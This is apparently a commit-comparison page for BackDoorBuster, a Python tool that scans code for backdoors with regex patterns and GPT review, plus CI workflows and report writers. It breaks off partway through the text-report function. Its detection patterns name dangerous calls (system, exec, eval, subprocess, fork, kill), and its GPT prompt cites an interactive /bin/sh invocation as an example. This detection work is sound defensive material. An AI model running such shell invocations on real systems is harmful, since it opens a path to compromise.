Compare commits
212 Commits
bf4c1e6702
...
main
| Author | SHA1 | Date | |
|---|---|---|---|
| c3ed3e166e | |||
| f6fa95ba16 | |||
| 94407e71b8 | |||
| 2adb1cbc2e | |||
| 430d2b8f8a | |||
| 752e774714 | |||
| 373defc5bb | |||
| c811e434c6 | |||
| 167bbe0a14 | |||
| e9b1e82492 | |||
| a2651b499e | |||
| a5f7665799 | |||
| caeee4d179 | |||
| 7198c8b4da | |||
| 843c9d7ba3 | |||
| cb30fddb1c | |||
| 81cbc88e9b | |||
| fc4e0e3b30 | |||
| ec30999d2c | |||
| 0f2fb3c925 | |||
| fd4ecce710 | |||
| 610e35f868 | |||
| 6e1c0e5ae6 | |||
| 977841837d | |||
| 42135c516c | |||
| 72901463c6 | |||
| 65820966df | |||
| b3435c00c3 | |||
| cd779ef43f | |||
| fbeba5b4fc | |||
| 3f6375977c | |||
| 5aafb1c24f | |||
| 5d41503b39 | |||
| 5a228e5cb0 | |||
| 4f5c67b32e | |||
| 4a55822a8f | |||
| 4e67f4ebed | |||
| 6f51f86d6a | |||
| f113449fc4 | |||
| 4f4860342c | |||
| 49408eda9f | |||
| e653ddd726 | |||
| ca69536e41 | |||
| d1ac4594e4 | |||
| 1a71a72ddf | |||
| da9b2b52ac | |||
| 62b77812af | |||
| 7eb4de8e6c | |||
| b99334ed12 | |||
| 17245a9bcf | |||
| b673575fe4 | |||
| df65fff2c7 | |||
| aeb4a33d98 | |||
| 89b37ddfd6 | |||
| f798cf143c | |||
| 95feda67d9 | |||
| 5ed90e39f8 | |||
| e80e83ad51 | |||
| 7cc81141c6 | |||
| 2a94f27edc | |||
| 0cd826c2fd | |||
| d56d0173ad | |||
| 0c4f560b7a | |||
| 41b16c53bc | |||
| 99b481059b | |||
| d2b0fb286c | |||
| 8a14ef4341 | |||
| e418bbf380 | |||
| d30ea0ca61 | |||
| 5552a7e448 | |||
| 99457f1ceb | |||
| 2b90268628 | |||
| dd4ab45cbf | |||
| 3f8b2a7987 | |||
| 40f5c07fa1 | |||
| b73170cd2d | |||
| b518fef6d2 | |||
| accd50e8ce | |||
| fab5e680ef | |||
| 6967a154f7 | |||
| c97780cde3 | |||
| b544007e6b | |||
| b1bc566c09 | |||
| f0e2251dc0 | |||
| faf68760c9 | |||
| 44c6086b8c | |||
| 27ec14be54 | |||
| 21d1a6f3cc | |||
| dbdfc1897c | |||
| 8fed7af432 | |||
| 9a7c38f1a8 | |||
| dd45c467a3 | |||
| 79a605a6b4 | |||
| 9d6f054478 | |||
| 569497f79e | |||
| 958dee355e | |||
| 8d445b11a4 | |||
| ed3b9e7e4c | |||
| 97fbf649a8 | |||
| db3244f55a | |||
| d073cfad31 | |||
| 0ae787002c | |||
| fa86f12a48 | |||
| 2e5460a522 | |||
| 594e0934e5 | |||
| 252d9c655e | |||
| 80fff100b5 | |||
| 3e0dd66d31 | |||
| 24206b13af | |||
| 3c7e5f4c3d | |||
| ca68c1ee94 | |||
| 84f4bf55bc | |||
| 6c3d18dd58 | |||
| e80838836c | |||
| bfacbb757c | |||
| 9d3d97209e | |||
| 4bbe8ea62f | |||
| 06387da6f4 | |||
| 6131de5ed1 | |||
| 7557f11672 | |||
| e28cb2416d | |||
| 953a320dd5 | |||
| 000146a835 | |||
| ebfc70eeae | |||
| 7523e0c06a | |||
| 1f9ccc53c1 | |||
| d771976b35 | |||
| 7a420b9bf8 | |||
| f0a915c0fd | |||
| bc067743ab | |||
| 698cf1c75c | |||
| b3f4a77a73 | |||
| 18454a0228 | |||
| 9e6b13d80e | |||
| 54419f9b53 | |||
| 4abd93f688 | |||
| 135a07219d | |||
| be59c891e5 | |||
| cafc83e517 | |||
| a6b67856ef | |||
| 7f3591959b | |||
| 92c3a5546b | |||
| dd109e5f5d | |||
| ae2ee482ad | |||
| 4835af7ff7 | |||
| 6041a8f573 | |||
| bc852ec52c | |||
| d60700e215 | |||
| 464db87919 | |||
| 102c631ed9 | |||
| 5eee69704a | |||
| 323200fd85 | |||
| c6deb1a174 | |||
| 50505aefb3 | |||
| 6533644222 | |||
| 00af8557ae | |||
| 4ea3685635 | |||
| ad41eea7d9 | |||
| d38f217b96 | |||
| 4bafab90f4 | |||
| 37d5c80724 | |||
| da24e1b103 | |||
| 9d5879b796 | |||
| b01e1f9a46 | |||
| 3f2f6070a8 | |||
| b0a99cb4f7 | |||
| 5714558965 | |||
| f2d4e1befc | |||
| 278e9ee42e | |||
| 2c844c8ed1 | |||
| 5993a14368 | |||
| 27ef6c9acc | |||
| d9c183fbd8 | |||
| c5cfcb00f7 | |||
| c2782327c3 | |||
| cb350b6288 | |||
| 74d0587e37 | |||
| 52230d096b | |||
| dd891443a9 | |||
| bf4a96cf34 | |||
| c366c0e672 | |||
| e2fa93f095 | |||
| f13d9266c6 | |||
| 52a5c94758 | |||
| 2c088eeb25 | |||
| a1b277f573 | |||
| 2b1847715d | |||
| b9ccc42a85 | |||
| ac99e99216 | |||
| 2f4903376c | |||
| 53a7120bfc | |||
| 973f863e92 | |||
| 28f2f7abf1 | |||
| fa98d64577 | |||
| c140f21b8e | |||
| 9be13bc4e3 | |||
| bfcbf99cf4 | |||
| 9155bf7a00 | |||
| 8c3616e90f | |||
| 8dc486cf47 | |||
| 9e5640ad80 | |||
| 3d961aa2d7 | |||
| a329bd41ad | |||
| 0c43771bdf | |||
| f2f8341e2c | |||
| 2ea91886df | |||
| 67a8b8fc6f | |||
| abc52b9249 | |||
| 26b3328a72 | |||
| 7d4f2b1693 | |||
| 144608abcb | |||
| 2c18a482cf |
1
.gitattributes
vendored
Normal file
1
.gitattributes
vendored
Normal file
@@ -0,0 +1 @@
|
||||
*.webp filter=lfs diff=lfs merge=lfs -text
|
||||
32
.github/actions/Auto_check_backdoor/action.yml
vendored
Normal file
32
.github/actions/Auto_check_backdoor/action.yml
vendored
Normal file
@@ -0,0 +1,32 @@
|
||||
# Composite GitHub Action: run this repo's backdoor and requirements
# detectors against a caller-supplied code tree.
name: "Backdoor Detection"
description: "Perform backdoor and vulnerability detection on your code and dependencies."
inputs:
  code_path:
    description: "Path to the code directory to be analyzed."
    required: true
  requirements_file:
    description: "Path to the requirements.txt file."
    required: true
  output_format:
    description: "Output format for the detection results (html, md, txt)."
    required: true
    default: "txt"
runs:
  using: "composite"
  steps:
    - name: Checkout code
      uses: actions/checkout@v2
    - name: Set up Python
      uses: actions/setup-python@v2
      with:
        python-version: "3.x"
    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        pip install packaging
      # FIX: every `run` step in a composite action must declare a shell;
      # this step was missing it, which makes the action fail validation.
      shell: bash
    - name: Run Backdoor Detection
      run: python ${{ github.workspace }}/detection/backdoor_detection.py ${{ inputs.code_path }} ${{ inputs.output_format }}
      shell: bash
    - name: Run Requirements Detection
      run: python ${{ github.workspace }}/detection/requirements_detection.py ${{ github.workspace }}/crawler/trans_extracted_data.txt ${{ inputs.requirements_file }} ${{ inputs.output_format }}
      shell: bash
|
||||
21
.github/workflows/python-tests.yml
vendored
Normal file
21
.github/workflows/python-tests.yml
vendored
Normal file
@@ -0,0 +1,21 @@
|
||||
# CI: run the unittest suite on every push / pull request targeting main.
name: Python application test

on:
  push:
    branches: [main]
  pull_request:
    branches: [main]

jobs:
  build:
    runs-on: "ubuntu-latest"

    steps:
      # NOTE(review): checkout is pulled from a self-hosted Gitea mirror, not
      # github.com -- confirm this host is reachable from the runner.
      - uses: https://git.mamahaha.work/actions/checkout@v2
      - name: Install dependencies
        # Tsinghua PyPI mirror is hard-coded; only appropriate for CN-hosted runners.
        run: pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
      - name: Run tests
        run: python -m unittest discover -s tests
        env:
          OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
          # NOTE(review): a LAN-specific proxy address is baked into CI -- this
          # breaks on any runner outside that network; move to a secret/variable.
          http_proxy: http://192.168.1.2:10809
|
||||
4
.gitignore
vendored
4
.gitignore
vendored
@@ -158,5 +158,5 @@ cython_debug/
|
||||
# be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore
|
||||
# and can be added to the global gitignore or merged into this file. For a more nuclear
|
||||
# option (not recommended) you can uncomment the following to ignore the entire idea folder.
|
||||
#.idea/
|
||||
|
||||
.idea/
|
||||
tmp/
|
||||
|
||||
2
MANIFEST.in
Normal file
2
MANIFEST.in
Normal file
@@ -0,0 +1,2 @@
|
||||
include README.md
|
||||
include LICENSE
|
||||
88
README.md
88
README.md
@@ -1,2 +1,90 @@
|
||||
# BackDoorBuster
|
||||
|
||||

|
||||
|
||||
## 项目背景
|
||||
|
||||
随着网络安全威胁的增加,恶意软件和后门的检测成为了保护个人和组织数据安全的重要任务。后门通常被隐藏在合法软件中,给黑客提供远程控制目标系统的能力。本项目旨在开发一个工具,能够有效识别和评估潜在的后门风险。
|
||||
|
||||
## 项目目的
|
||||
|
||||
本项目的主要目的是开发一个自动化工具,用于检测和评估代码库中潜在的后门风险。通过搜索包含特定敏感操作(如直接调用 `shell`)的代码段,并对发现的结果进行评级,从而帮助安全团队识别和修复安全漏洞。
|
||||
|
||||
## 项目开发目标
|
||||
|
||||
- **敏感操作检测**: 使用正则表达式来搜索代码中可能指示后门的敏感操作,如命令行执行(例如 `bin/sh`)。
|
||||
- **风险评级系统**: 对检测到的敏感操作进行分类和风险评级,帮助用户理解每个发现的潜在威胁级别。
|
||||
- **简易的用户接口**: 提供一个简单的命令行接口,允许用户快速扫描项目并获取报告。
|
||||
- **报告生成**: 自动生成详细的检测报告,列出所有发现的敏感操作和对应的风险等级。
|
||||
- **持续更新与维护**: 随着新的后门技术和检测方法的出现,持续更新正则表达式库和评级标准。
|
||||
|
||||
## 打包
|
||||
|
||||
### pip
|
||||
|
||||
#### 打包命令
|
||||
|
||||
```bash
|
||||
pip install wheel
|
||||
python setup.py sdist bdist_wheel
|
||||
```
|
||||
|
||||
执行上述命令后,会在 dist 目录下生成 .tar.gz 和 .whl 文件。
|
||||
|
||||
#### 本地安装
|
||||
|
||||
- 安装 .whl 文件:
|
||||
|
||||
``` bash
|
||||
pip install dist/backdoor_buster-0.1.0-py3-none-any.whl
|
||||
```
|
||||
|
||||
- 安装 .tar.gz 文件:
|
||||
|
||||
``` bash
|
||||
pip install dist/backdoor_buster-0.1.0.tar.gz
|
||||
```
|
||||
|
||||
#### 上传到 PyPI
|
||||
|
||||
- 安装 twine:
|
||||
|
||||
``` bash
|
||||
pip install twine
|
||||
```
|
||||
|
||||
- 使用 twine 上传包到 PyPI:
|
||||
|
||||
``` bash
|
||||
twine upload dist/*
|
||||
```
|
||||
|
||||
需要提供 PyPI 的用户名和密码。如果没有 PyPI 账号,可以在 PyPI 注册。
|
||||
|
||||
#### 使用 PyPI 安装
|
||||
|
||||
包上传到 PyPI 后,可以通过以下命令安装:
|
||||
|
||||
``` bash
|
||||
pip install backdoor_buster
|
||||
```
|
||||
|
||||
## 使用说明
|
||||
|
||||
1. 执行扫描:
|
||||
|
||||
```bash
|
||||
python -m detection <project_directory> -o <path> -m <mode>
|
||||
```
|
||||
|
||||
2. 查看报告:
|
||||
|
||||
报告将以文本形式输出在控制台,并可选择输出到指定文件。
|
||||
|
||||
## 贡献指南
|
||||
|
||||
欢迎安全研究人员和开发人员贡献代码,改进正则表达式和评级逻辑。请通过 pull requests 提交您的贡献。
|
||||
|
||||
## 许可证
|
||||
|
||||
本项目采用 `MIT` 许可证。详情请见 [LICENSE](./LICENSE) 文件。
|
||||
|
||||
0
__init__.py
Normal file
0
__init__.py
Normal file
32
action.yml
Normal file
32
action.yml
Normal file
@@ -0,0 +1,32 @@
|
||||
# Composite GitHub Action (root copy, duplicated under .github/actions/):
# run this repo's backdoor and requirements detectors.
name: "Backdoor Detection"
description: "Perform backdoor and vulnerability detection on your code and dependencies."
inputs:
  code_path:
    description: "Path to the code directory to be analyzed."
    required: true
  requirements_file:
    description: "Path to the requirements.txt file."
    required: true
  output_format:
    description: "Output format for the detection results (html, md, txt)."
    required: true
    default: "txt"
runs:
  using: "composite"
  steps:
    - name: Checkout code
      uses: actions/checkout@v2
    - name: Set up Python
      uses: actions/setup-python@v2
      with:
        python-version: "3.x"
    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        pip install packaging
      # FIX: every `run` step in a composite action must declare a shell;
      # this step was missing it, which makes the action fail validation.
      shell: bash
    - name: Run Backdoor Detection
      run: python ${{ github.workspace }}/detection/backdoor_detection.py ${{ inputs.code_path }} ${{ inputs.output_format }}
      shell: bash
    - name: Run Requirements Detection
      run: python ${{ github.workspace }}/detection/requirements_detection.py ${{ github.workspace }}/crawler/trans_extracted_data.txt ${{ inputs.requirements_file }} ${{ inputs.output_format }}
      shell: bash
|
||||
BIN
banner.webp
(Stored with Git LFS)
Normal file
BIN
banner.webp
(Stored with Git LFS)
Normal file
Binary file not shown.
105
detection/GPTdetection.py
Normal file
105
detection/GPTdetection.py
Normal file
@@ -0,0 +1,105 @@
|
||||
import json
|
||||
import os
|
||||
import threading
|
||||
import time
|
||||
|
||||
from .utils import *
|
||||
import openai
|
||||
# import signal
|
||||
|
||||
|
||||
class TimeoutException(Exception):
    """Custom exception to handle timeouts.

    Raised by timeout_handler() when a SIGALRM fires. Kept even though the
    signal-based alarm in detectGPT() is currently commented out.
    """

    pass
|
||||
|
||||
|
||||
def timeout_handler(signum, frame):
    """Handle the SIGALRM signal by raising a TimeoutException.

    Args:
        signum: signal number delivered by the OS (unused).
        frame: stack frame active when the signal arrived (unused).
    """
    raise TimeoutException
|
||||
|
||||
|
||||
def detectGPT(content: str):
    """Ask an OpenAI-compatible endpoint to classify security risks in *content*.

    Args:
        content: source code to analyze (line numbers in the response refer to
            lines of this string, 1-based).

    Returns:
        dict: {"high": [], "medium": [], "low": [], "none": []} where each
        entry is a (line_number, stripped_source_line) tuple.

    Raises:
        ValueError: if OPENAI_API_KEY is unset, the response body is None, or
            the response is not valid JSON.
    """
    api_key = os.getenv("OPENAI_API_KEY")
    if api_key is None:
        raise ValueError("env OPENAI_API_KEY not set")

    # NOTE(review): requests go to a third-party proxy endpoint, not
    # api.openai.com -- the analyzed source code leaves the machine. Confirm
    # this endpoint is trusted before use.
    client = openai.OpenAI(base_url="https://api.kpi7.cn/v1", api_key=api_key)
    text = content
    # SECURITY FIX: a hard-coded "test" API key that used to live here in a
    # comment has been removed; never commit credentials, even commented out.
    response = client.chat.completions.create(
        messages=[
            {
                "role": "system",
                "content": "You are a Python code reviewer.Read the code below and identify any potential security vulnerabilities. Classify them by risk level (high, medium, low, none). Only report the line number and the risk level.\nYou should output the result as json format in one line. For example: "
                '[{"Line": {the line number}, "Risk": "{choose from (high,medium,low)}","Reason":"{how it is vulnable}"}] Each of these three field is required.\n'
                "You are required to only output the json format. Do not output any other information.请注意:只对有具体危害的代码片段判定为有风险。\n"
                "For examples:\nos.system('ls'),subprocess.call(['ls', '-l']),subprocess.call([\"/bin/sh\",\"-i\"]),eval(code),exec(code) and so on.\n"
                "Please IGNORE the risks that dont matter a lot.",
            },
            {
                "role": "user",
                "content": text,
            },
        ],
        model="gpt-4o",
    )
    try:
        message_content = response.choices[0].message.content
        if message_content is None:
            raise ValueError("API response content is None")
        res_json = json.loads(message_content)
    except json.JSONDecodeError:
        raise ValueError("Error: Could not parse the response. Please try again.")
    # The former `except TimeoutException` clause was dead code: the
    # signal.alarm() call that could trigger it is commented out above.

    classified_results = {"high": [], "medium": [], "low": [], "none": []}
    source_lines = text.split("\n")  # hoisted out of the loop
    for res in res_json:
        try:
            risk = res.get("Risk")
            if risk not in classified_results:
                # BUG FIX: unexpected risk labels used to raise KeyError and
                # abort the whole scan; skip malformed entries instead.
                continue
            classified_results[risk].append(
                (res["Line"], source_lines[res["Line"] - 1].strip())
            )
        except (AttributeError, IndexError, KeyError, TypeError):
            # tolerate any malformed entry returned by the model
            pass
    return classified_results
|
||||
|
||||
|
||||
def GPTdetectFileList(fileList):
    """Scan every file in *fileList* with the GPT detector, one thread per file.

    File contents are read up front; thread starts are staggered to avoid
    hammering the API. Returns the shared results dict.
    """
    results = {"high": [], "medium": [], "low": [], "none": []}
    workers = [
        threading.Thread(
            target=GPTThread,
            args=(str(path), read_file_content(str(path)), results),
        )
        for path in fileList
    ]
    for worker in workers:
        worker.start()
        time.sleep(0.1)  # stagger request bursts
    for worker in workers:
        worker.join()
    return results
|
||||
|
||||
|
||||
def GPTThread(filename, content, results):
    """Worker: run detectGPT on one file's content and merge into shared results.

    Args:
        filename: path of the file being scanned, used to label findings.
        content: the file's source text.
        results: shared dict {"high": [], "medium": [], "low": [], "none": []};
            list.extend is atomic under the GIL, so workers can append safely.
    """
    try:
        res = detectGPT(content)
        for key in res:
            if key != "none":  # Exclude 'none' risk level
                results[key].extend(
                    [
                        # BUG FIX: label findings with the real file name
                        # instead of the hard-coded "(unknown)" placeholder,
                        # matching the labels produced by process_path().
                        (f"{filename}: Line {line_num}", line)
                        for line_num, line in res[key]
                    ]
                )
    except Exception as e:
        # best-effort: a failure on one file must not kill the whole scan
        print(e)
|
||||
52
detection/Regexdetection.py
Normal file
52
detection/Regexdetection.py
Normal file
@@ -0,0 +1,52 @@
|
||||
import re
|
||||
from typing import Dict, List, Tuple
|
||||
from .utils import remove_comments
|
||||
|
||||
|
||||
def find_dangerous_functions(
    file_content: str, file_extension: str
) -> Dict[str, List[Tuple[int, str]]]:
    """Scan *file_content* line by line for dangerous-call patterns.

    Args:
        file_content: source text to scan (may be None, yielding no findings).
        file_extension: file suffix (".py", ".js", ".cpp", ".pyc") selecting
            the regex set; unknown suffixes match nothing.

    Returns:
        Findings keyed by risk level; each entry is (line_number, cleaned_line).
    """
    patterns = {
        ".py": {
            r"\bsystem\(": "high",
            r"\bexec\(": "high",
            r"\bpopen\(": "medium",
            r"\beval\(": "high",
            r"\bsubprocess": "medium",
            r"\b__getattribute__\(": "high",
            r"\bgetattr\(": "medium",
            r"\b__import__\(": "high",
        },
        ".js": {
            r"\beval\(": "high",
            r"\bexec\(": "high",
            r"\bchild_process\.exec\(": "high",
        },
        ".cpp": {
            r"\bsystem\(": "high",
        },
        ".pyc": {
            r"\bexec\b": "high",
            r"\beval\b": "high",
            r"\bos\.system\b": "high",
            r"\bos\.exec\b": "high",
            r"\bos\.fork\b": "high",
            r"\bos\.kill\b": "high",
            r"\bos\.popen\b": "medium",
            r"\bos\.spawn\b": "medium",
            r"\bsubprocess": "medium",
        },
    }
    risk_patterns = patterns.get(file_extension, {})
    findings = {"high": [], "medium": [], "low": [], "none": []}
    if file_content is None:
        return findings
    for lineno, raw_line in enumerate(file_content.split("\n"), start=1):
        stripped = remove_comments(raw_line, file_extension)
        if not stripped:
            continue
        # drop literal "\n" escape sequences so they don't skew the regexes
        stripped = stripped.replace("\\n", "")
        for regex, severity in risk_patterns.items():
            if re.search(regex, stripped, re.MULTILINE | re.DOTALL):
                findings[severity].append((lineno, stripped))
    return findings
|
||||
0
detection/__init__.py
Normal file
0
detection/__init__.py
Normal file
502
detection/__main__.py
Normal file
502
detection/__main__.py
Normal file
@@ -0,0 +1,502 @@
|
||||
import json
|
||||
import os
|
||||
from typing import Dict, List, Tuple, Optional
|
||||
from reportlab.lib.pagesizes import letter
|
||||
from reportlab.lib.styles import getSampleStyleSheet
|
||||
from reportlab.platypus import Paragraph, Spacer, SimpleDocTemplate
|
||||
|
||||
from detection.pickle_detection import pickleDataDetection
|
||||
|
||||
from .requirements_detection import requirement_detection
|
||||
from .Regexdetection import find_dangerous_functions
|
||||
from .GPTdetection import detectGPT, GPTdetectFileList
|
||||
|
||||
# from .cngptdetection import detectGPT,GPTdetectFileList
|
||||
from .pyc_detection import disassemble_pyc
|
||||
from .utils import *
|
||||
import sys
|
||||
from colorama import init, Fore, Style
|
||||
from tqdm import tqdm
|
||||
from pathlib import Path
|
||||
|
||||
PYCDC_FLAG = True
|
||||
PYCDC_ADDR_FLAG = True
|
||||
SUPPORTED_EXTENSIONS = {".py", ".js", ".cpp", ".pyc",".pkl",".pickle"}
|
||||
OUTPUT_FORMATS = ["html", "md", "txt", "pdf"]
|
||||
ORDERS = [
|
||||
"__import__",
|
||||
"system",
|
||||
"exec",
|
||||
"popen",
|
||||
"eval",
|
||||
"subprocess",
|
||||
"__getattribute__",
|
||||
"getattr",
|
||||
"child_process",
|
||||
"kill",
|
||||
"fork",
|
||||
]
|
||||
|
||||
# Initialize colorama
|
||||
init(autoreset=True)
|
||||
|
||||
ORANGE = "\033[38;5;214m"
|
||||
CYAN = Fore.CYAN
|
||||
|
||||
|
||||
def supports_color() -> bool:
    """Report whether the current terminal can render ANSI colors.

    Windows is assumed colorable; on every other platform stdout must be a
    TTY for color output to be enabled.

    Returns:
        bool: True if color output is supported, False otherwise.
    """
    if sys.platform == "win32":
        return True
    isatty = getattr(sys.stdout, "isatty", None)
    return bool(isatty and isatty())
|
||||
|
||||
|
||||
def supports_emoji() -> bool:
    """Report whether the running terminal likely renders emoji.

    Heuristic: everything except the classic Windows console is assumed
    capable; Windows Terminal is detected via the WT_SESSION variable.

    Returns:
        bool: True if emoji output is assumed safe, False otherwise.
    """
    if sys.platform != "win32":
        return True
    return os.getenv("WT_SESSION") is not None
|
||||
|
||||
|
||||
def highlight_orders(line: str, risk_level: str, use_color: bool) -> str:
    """Wrap every known dangerous keyword in *line* in a risk-colored ANSI span.

    Args:
        line: the source line to decorate.
        risk_level: "high", "medium" or "low"; anything else maps to white.
        use_color: when False the line is returned with no escape codes added.

    Returns:
        str: the line with each ORDERS keyword color-wrapped (or unchanged).
    """
    if use_color:
        palette = {"high": Fore.RED, "medium": Fore.YELLOW, "low": CYAN}
        color = palette.get(risk_level, Fore.WHITE)
        reset = Style.RESET_ALL
    else:
        color = ""
        reset = ""
    for keyword in ORDERS:
        line = line.replace(keyword, f"{color}{keyword}{reset}")
    return line
|
||||
|
||||
|
||||
def generate_text_content(results: Dict[str, List[Tuple[int, str]]]) -> str:
    """
    Generates a formatted text report for security analysis results.

    Unlike output_text(), this variant decorates the report with ANSI colors
    and emoji when the terminal supports them, and renders the "pickles"
    section (a list of {"file", "result"} dicts) as JSON lines.

    Args:
        results (Dict[str, List[Tuple[int, str]]]): The security analysis results categorized by risk levels.

    Returns:
        str: The formatted text report as a string.
    """
    use_color = supports_color()
    use_emoji = supports_emoji()

    text_output = "Security Analysis Report\n"
    text_output += "=" * 30 + "\n\n"

    for risk_level, entries in results.items():
        if risk_level == "pickles":
            # pickle findings carry per-file dicts rather than (line, text) tuples
            text_output += f"Pickles:\n"
            for i in entries:
                text_output += f"  {i['file']}:{json.dumps(i['result'])}\n"
        elif entries and risk_level != "none":
            # section-header color per severity (empty string when unsupported)
            risk_color = (
                {
                    "high": Fore.RED,
                    "medium": Fore.YELLOW,
                    "low": Fore.GREEN,
                }.get(risk_level, Fore.WHITE)
                if use_color
                else ""
            )

            # emoji suffix per severity (empty strings when unsupported);
            # keyed by the capitalized level name used below
            risk_title = (
                {
                    "High": "👹",
                    "Medium": "👾",
                    "Low": "👻",
                }
                if use_emoji
                else {
                    "High": "",
                    "Medium": "",
                    "Low": "",
                }
            )

            text_output += f"{risk_color}{risk_level.capitalize()} Risk{risk_title[risk_level.capitalize()]}:{Style.RESET_ALL if use_color else ''}\n"
            text_output += "-" * (len(risk_level) + 6) + "\n"
            for line_num, line in entries:
                # colorize the dangerous keywords inside the reported line
                line = highlight_orders(line, risk_level, use_color)
                line_text = f"{Style.RESET_ALL if use_color else ''}  {Fore.GREEN if use_color else ''}{line_num}{Style.RESET_ALL if use_color else ''}: {line}{Style.RESET_ALL if use_color else ''}\n"
                text_output += line_text
            text_output += "\n"

    return text_output
|
||||
|
||||
|
||||
def output_results(
    results: Dict[str, List[Tuple[int, str]]],
    output_format: str,
    output_file: Optional[str] = None,
) -> None:
    """
    Write the security analysis results in the requested format.

    Args:
        results: analysis findings categorized by risk level.
        output_format: one of "pdf", "html", "md", "txt"; anything else
            silently falls back to "txt" (and the file is renamed to .txt).
        output_file: destination path; when None, a colorized text report is
            printed to the terminal instead.
    """
    if not output_file:
        # no file requested: render the colorized report straight to stdout
        print(generate_text_content(results))
        return

    valid_formats = {"pdf", "html", "md", "txt"}
    base_name, _ = os.path.splitext(output_file)
    if output_format not in valid_formats:
        output_format = "txt"
        output_file = f"{base_name}.txt"

    # create the destination directory on demand
    target_dir = os.path.dirname(output_file)
    if target_dir != "" and not os.path.exists(target_dir):
        os.makedirs(target_dir)

    # dispatch table; unknown formats default to plain text
    writers = {"pdf": output_pdf, "html": output_html, "md": output_markdown}
    writers.get(output_format, output_text)(results, output_file)
|
||||
|
||||
|
||||
def output_pdf(results: Dict[str, List[Tuple[int, str]]], file_name):
    """Render the analysis results as a PDF report via reportlab.

    Args:
        results: findings keyed by risk level ("none" is skipped).
        file_name: destination path for the generated PDF.
    """
    styles = getSampleStyleSheet()

    # centered report title followed by a gap
    title_style = styles["Title"]
    title_style.alignment = 1
    story = [Paragraph("Security Analysis Report", title_style), Spacer(1, 20)]

    # one heading plus one paragraph per finding, section-separated by spacers
    body_style = styles["BodyText"]
    for severity, findings in results.items():
        if severity == "none":
            continue
        story.append(Paragraph(f"{severity.capitalize()} Risk:", styles["Heading2"]))
        for line_no, code_line in findings:
            story.append(Paragraph(f"Line {line_no}: {code_line}", body_style))
        story.append(Spacer(1, 12))

    SimpleDocTemplate(file_name, pagesize=letter).build(story)
|
||||
|
||||
|
||||
def output_html(results: Dict[str, List[Tuple[int, str]]], file_name=None):
    """
    Generates an HTML report for security analysis results.

    Fixes over the previous version: the "pickles" key produced by
    process_path() used to raise KeyError here; unknown risk levels are now
    tolerated, and finding text is HTML-escaped so code such as "<b>" cannot
    corrupt the page.

    Args:
        results (Dict[str, List[Tuple[int, str]]]): The security analysis results categorized by risk levels.
        file_name (Optional[str]): The name of the file to save the HTML output. If None, returns the HTML string.

    Returns:
        Optional[str]: The HTML string if file_name is None, otherwise None.
    """
    from html import escape  # stdlib; local import keeps module-level deps unchanged

    html_output = """
    <html>
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="icon" href="https://s2.loli.net/2024/05/30/WDc6MekjbuCU9Qo.png">
        <title>Security Analysis Report</title>
        <style>
            body {
                background-image: url('https://s2.loli.net/2024/05/30/85Mv7leB2IRWNp6.jpg');
                background-size: 100%, auto;
                background-attachment: fixed;
                font-family: Arial, sans-serif;
            }
            h1, h2 {
                color: white;
            }
            ul {
                list-style-type: none;
                padding: 0;
            }
            li {
                background: rgba(255, 255, 255, 0.8);
                margin: 5px 0;
                padding: 10px;
                border-radius: 5px;
            }
        </style>
    </head>
    <body>
        <h1>Security Analysis Report</h1>
    """

    emoji_by_level = {"high": "👹", "medium": "👾", "low": "👻"}
    for risk_level, entries in results.items():
        if risk_level == "none":
            continue
        if risk_level == "pickles":
            # pickle findings are dicts, not (line, text) tuples
            if entries:
                html_output += "<h2>Pickles</h2><ul>"
                for item in entries:
                    html_output += (
                        f"<li>{escape(str(item['file']))}: "
                        f"{escape(json.dumps(item['result']))}</li>"
                    )
                html_output += "</ul>"
            continue
        emoji = emoji_by_level.get(risk_level, "")
        html_output += f"<h2>{risk_level.capitalize()} Risk{emoji}</h2><ul>"
        for line_num, line in entries:
            html_output += f"<li>{escape(str(line_num))}: {escape(str(line))}</li>"
        html_output += "</ul>"

    html_output += "</body></html>"

    if file_name:
        with open(file_name, "w", encoding="utf-8") as file:
            file.write(html_output)
        return None
    else:
        return html_output
|
||||
|
||||
|
||||
def output_markdown(results: Dict[str, List[Tuple[int, str]]], file_name=None):
    """
    Generates a Markdown report for security analysis results.

    Fixes over the previous version: "pickles" entries (dicts) used to be
    tuple-unpacked into garbage rows; pipe characters in finding text are now
    escaped so they cannot break the table layout; output is written as UTF-8.

    Args:
        results (Dict[str, List[Tuple[int, str]]]): The security analysis results categorized by risk levels.
        file_name (Optional[str]): The name of the file to save the Markdown output. If None, returns the Markdown string.

    Returns:
        Optional[str]: The Markdown string if file_name is None, otherwise None.
    """
    md_output = "# Security Analysis Report\n\n"

    for risk_level, entries in results.items():
        if risk_level == "none":
            continue
        if risk_level == "pickles":
            # pickle findings are dicts, not (line, text) tuples
            if entries:
                md_output += "## Pickles\n\n"
                for item in entries:
                    md_output += f"- `{item['file']}`: {json.dumps(item['result'])}\n"
                md_output += "\n"
            continue
        md_output += f"## {risk_level.capitalize()} Risk\n\n"
        md_output += "| Line Number | Description |\n"
        md_output += "|-------------|-------------|\n"
        for line_num, line in entries:
            # escape pipes so code like "a | b" cannot break the table
            safe_line = str(line).replace("|", "\\|")
            md_output += f"| {line_num} | {safe_line} |\n"
        md_output += "\n"

    if file_name:
        with open(file_name, "w", encoding="utf-8") as file:
            file.write(md_output)
        return None
    else:
        return md_output
|
||||
|
||||
|
||||
def output_text(results: Dict[str, List[Tuple[int, str]]], file_name=None):
    """
    Generates a plain text report for security analysis results.

    Fixes over the previous version: "pickles" entries (dicts) used to be
    tuple-unpacked, printing dict keys instead of findings; output is written
    as UTF-8.

    Args:
        results (Dict[str, List[Tuple[int, str]]]): The security analysis results categorized by risk levels.
        file_name (Optional[str]): The name of the file to save the text output. If None, returns the text string.

    Returns:
        Optional[str]: The text string if file_name is None, otherwise None.
    """
    text_output = "Security Analysis Report\n"
    text_output += "=" * len("Security Analysis Report") + "\n\n"

    for risk_level, entries in results.items():
        if risk_level == "none":
            continue
        if risk_level == "pickles":
            # pickle findings are dicts, not (line, text) tuples
            if entries:
                text_output += "Pickles:\n"
                for item in entries:
                    text_output += f"  {item['file']}: {json.dumps(item['result'])}\n"
                text_output += "\n"
            continue
        text_output += f"{risk_level.capitalize()} Risk:\n"
